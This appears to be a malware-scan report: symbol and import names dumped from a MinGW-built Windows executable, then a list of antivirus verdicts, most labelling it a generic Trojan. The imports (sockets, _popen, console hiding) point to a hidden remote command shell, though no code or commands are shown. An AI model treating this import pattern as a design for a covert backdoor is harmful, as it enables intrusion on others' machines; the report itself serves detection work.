.eh_frame$_ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__setargv
___cpu_features_init
.text.startup
___do_global_dtors
___do_global_ctors
___dyn_tls_init@12
___tlregdtor
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
___mingw_TLScallback
__pei386_runtime_relocator
.debug_info
.debug_abbrev
.debug_line
.debug_aranges
.debug_frame
_fesetenv
___mingw_glob
___mingw_globfree
___mingw_dirname
___mingw_opendir
___mingw_readdir
___mingw_closedir
___mingw_rewinddir
___mingw_telldir
___mingw_seekdir
___mingw_sleep
___FRAME_END__
___JCR_END__
_register_frame_ctor
.ctors.65535
.rdata_runtime_pseudo_reloc
__imp__FindFirstFileA@8
__imp__strtok
__fu4___ZSt4cerr
_ShowWindow@8
_VirtualProtect@16
___RUNTIME_PSEUDO_RELOC_LIST__
__imp___fullpath
_FindFirstFileA@8
__imp___setmode
__data_start__
_FreeLibrary@4
___DTOR_LIST__
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
__imp__VirtualProtect@16
__imp__recv@16
__imp___Unwind_Resume
__imp___onexit
___p__fmode
__imp__GetLastError@0
_SetUnhandledExceptionFilter@4
__imp__VirtualQuery@12
__fu3___ZSt4cout
__imp____register_frame_info
__nm___ZSt4cout
__imp__FindNextFileA@8
___tls_start__
__imp__TlsGetValue@4
__libmsvcrt_a_iname
__imp__InitializeCriticalSection@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
_DeleteCriticalSection@4
__rt_psrelocs_start
__imp__abort
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__dll_characteristics__
__imp__chdir
__size_of_stack_commit__
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
__size_of_stack_reserve__
__major_subsystem_version__
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
__imp__stricoll
__imp____mb_cur_max
__imp__AllocConsole@0
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
_GetLastError@0
__imp____p__environ
__imp___pctype
_VirtualQuery@12
__head_libuser32_a
_mingw_initltsdrot_force
__imp___ZSt4cerr
__imp___iob
__ZNSt8ios_base4InitC1Ev
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_GetModuleHandleA@4
__imp__strncmp
___register_frame_info
__libmoldname_a_iname
_hmod_libgcc
.weak.___register_frame_info.___EH_FRAME_BEGIN__
__imp____deregister_frame_info
__imp__strdup
__imp___isctype
__bss_start__
___RUNTIME_PSEUDO_RELOC_LIST_END__
__fpreset
__size_of_heap_commit__
_libgcc_s_dw2_1_dll_iname
__imp___errno
__fu0___ZSt4cout
___p__environ
__imp__GetProcAddress@8
_GetProcAddress@8
___crt_xp_start__
__imp__wcstombs
__nm___ZSt4cerr
__fu2___ZSt4cout
_GetCommandLineA@0
__ZNSaIcEC1Ev
__imp___ZNSt8ios_base4InitD1Ev
___crt_xp_end__
__imp__signal
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
__imp__puts
__minor_os_version__
__imp__atexit
___udivdi3
__imp__mbstowcs
__imp___ZSt4cout
__head_libmsvcrt_a
__image_base__
__isctype
__imp__exit
__section_alignment__
_socket@12
_LoadLibraryA@4
_wcstombs
__imp__FreeLibrary@4
__imp__GetStartupInfoA@4
__IAT_end__
__head_libmoldname_a
__RUNTIME_PSEUDO_RELOC_LIST__
__imp__htons@4
_setlocale
__imp____p__fmode
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
__tls_start
_ExitProcess@4
__imp__strcoll
__data_end__
___getmainargs
_FindClose@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
__CTOR_LIST__
_mbstowcs
__imp___popen
___set_app_type
__imp___ZNSaIcEC1Ev
__bss_end__
__CRT_fmode
__head_libwsock32_a
__imp___ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
___crt_xc_end__
__tls_index
__imp___ZNSt8ios_base4InitC1Ev
__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
___crt_xc_start__
__imp__fgets
__imp__socket@12
__head_libstdc___6_dll
__imp__closesocket@4
___CTOR_LIST__
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_FindWindowA@8
_AllocConsole@0
__imp___pclose
__rt_psrelocs_size
_GetStartupInfoA@4
__imp__FindWindowA@8
_WSAStartup@8
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
__imp____udivdi3
__imp___ZNSolsEPFRSoS_E
__imp__memcpy
_FindNextFileA@8
__imp__strcmp
__imp__inet_addr@4
__file_alignment__
__imp__LeaveCriticalSection@4
__imp__malloc
__head_libgcc_s_dw2_1_dll
__imp__strncpy
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
___EH_FRAME_BEGIN__
__imp__memcmp
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__major_os_version__
__imp__realloc
__IAT_start__
_stricoll
__tls_end
__imp__GetModuleHandleA@4
__DTOR_LIST__
__imp___fpreset
.weak.___deregister_frame_info.___EH_FRAME_BEGIN__
_EnterCriticalSection@4
__imp__memset
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
__fullpath
__ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__size_of_heap_reserve__
___crt_xt_start__
___ImageBase
__subsystem__
__imp__strlen
.weak.__Jv_RegisterClasses.___EH_FRAME_BEGIN__
__CRT_fenv
__imp__strcpy
__imp__calloc
__fu1___ZSt4cout
__Jv_RegisterClasses
__imp____getmainargs
___tls_end__
__imp__ExitProcess@4
_mingw_initltssuo_force
__imp__WSACleanup@0
__imp__send@16
_InitializeCriticalSection@4
___cpu_features
__imp__free
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
__imp__SetUnhandledExceptionFilter@4
___deregister_frame_info
__imp___ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
__major_image_version__
__loader_flags__
__libuser32_a_iname
__imp__ShowWindow@8
__imp__tolower
__CRT_glob
___gxx_personality_v0
__setmode
_libstdc___6_dll_iname
__imp__printf
___chkstk_ms
_inet_addr@4
__head_libkernel32_a
__rt_psrelocs_end
__imp___cexit
__minor_subsystem_version__
__imp__FindClose@4
__minor_image_version__
__imp__Sleep@4
__imp__vfprintf
__imp___ZNSaIcED1Ev
_closesocket@4
__imp____set_app_type
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
_mingw_initltsdyn_force
__Unwind_Resume
__ZNSaIcED1Ev
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
_TlsGetValue@4
__imp__DeleteCriticalSection@4
_LeaveCriticalSection@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
__imp__WSAStartup@8
__imp__GetCommandLineA@0
__imp__LoadLibraryA@4
__ZNSolsEPFRSoS_E
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_WSACleanup@0
__imp__setlocale
__RUNTIME_PSEUDO_RELOC_LIST_END__
__libkernel32_a_iname
___dyn_tls_init_callback
_connect@12
__libwsock32_a_iname
__imp__connect@12
__tls_used
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
__ZNSt8ios_base4InitD1Ev
___crt_xt_end__
_vfprintf
__imp__strcat
__imp__EnterCriticalSection@4
__imp__fwrite
__imp____gxx_personality_v0
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.GenericFCA.4!c
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericFCA.Agent.119790
Cylance Unsafe
Sangfor Trojan.Win32.Agent.Vp2d
K7AntiVirus Trojan ( 00502cba1 )
Alibaba Trojan:Win32/MalwareX.5eb7b328
K7GW Trojan ( 00502cba1 )
Cybereason malicious.6ec35c
huorong Clean
Baidu Clean
VirIT Trojan.Win32.Genus.WGL
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Agent.VNV
APEX Clean
McAfee Clean
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.gen
BitDefender Trojan.GenericFCA.Agent.119790
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericFCA.Agent.119790
Tencent Win32.Trojan.Agent.Rnkl
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.Agent.rxfqc
DrWeb Clean
VIPRE Trojan.GenericFCA.Agent.119790
TrendMicro Clean
McAfeeD ti!9CC2E2D5FEEB
Trapmine Clean
FireEye Trojan.GenericFCA.Agent.119790
Emsisoft Trojan.GenericFCA.Agent.119790 (B)
Ikarus Trojan.Win32.Injector
GData Trojan.GenericFCA.Agent.119790
Jiangmin Clean
Webroot Clean
Varist W32/ABTrojan.WPND-4484
Avira TR/AVI.Agent.rxfqc
Antiy-AVL Trojan/Win32.Agent
Kingsoft Win32.Trojan.Agent.gen
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.GenericFCA.Agent.D1D3EE
SUPERAntiSpyware Clean
ZoneAlarm Trojan.Win32.Agent.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5658453
Acronis Clean
BitDefenderTheta Gen:NN.ZexaF.36810.e0Y@amuQCij
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Trojan.Script.PWRS
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09DQ24
Rising Trojan.Agent!8.B1E (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.243317448.susgen
Fortinet W32/Agent.VNV!tr
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike Clean
alibabacloud Trojan:Win/Agent.VTN
No IRMA results available.